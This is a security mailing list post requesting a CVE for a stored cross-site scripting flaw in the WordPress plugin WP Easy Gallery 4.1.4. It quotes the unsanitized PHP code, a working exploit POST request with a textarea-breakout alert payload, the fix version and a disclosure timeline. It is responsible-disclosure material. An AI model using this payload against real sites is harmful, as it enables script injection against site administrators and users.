Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 26 Jan 2016 15:29:35 +0530
From: Rahul Pratap Singh <techno.rps@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE Request: WP Easy Gallery v4.1.4 Stored XSS Vulnerability

#Product    : WP Easy Gallery
#Version    : 4.1.4
#Home page Link  : https://wordpress.org/plugins/wp-easy-gallery

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
"custom_style" parameter is not sanitized that leads to Stored XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
File Name: wpeg-settings.php

Found at line:12
$temp_defaults['custom_style'] = isset($_POST['custom_style']) ?
$_POST['custom_style'] : '';

Found at line:103
<td><textarea name="custom_style" id="custom_style" rows="4"
cols="40"><?php _e($default_options['custom_style']); ?></textarea></td>

----------------------------------------
Exploit:
----------------------------------------
POST /wp-admin/admin.php?page=wpeg-settings

wpeg_settings=3b59e6c6ef&_wp_http_referer=abc&display_mode=abc&num_columns=abc&show_gallery_name=abc&gallery_name_alignment=abc&use_default_style=abc&drop_shadow=abc&custom_style=</textarea><input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)><!--&defaultSettings=xss&Submit=Save

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/easy-gallery-settingsxsspoc.png

Fix:
Update to 4.1.5

Disclosure Timeline:
reported to wordpress  : 18/1/2016
wordpress response (plugin taken down) : 19/1/2016
vendor deployed a patch : 26/1/2016

#######################################
#        CTG SECURITY SOLUTIONS     #
#        www.ctgsecuritysolutions.com    #
#######################################

Pub ref:
https://0x62626262.wordpress.com/2016/01/26/wp-easy-gallery-v4-1-4-stored-xss-vulnerability/
https://wordpress.org/plugins/wp-easy-gallery/changelog/

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ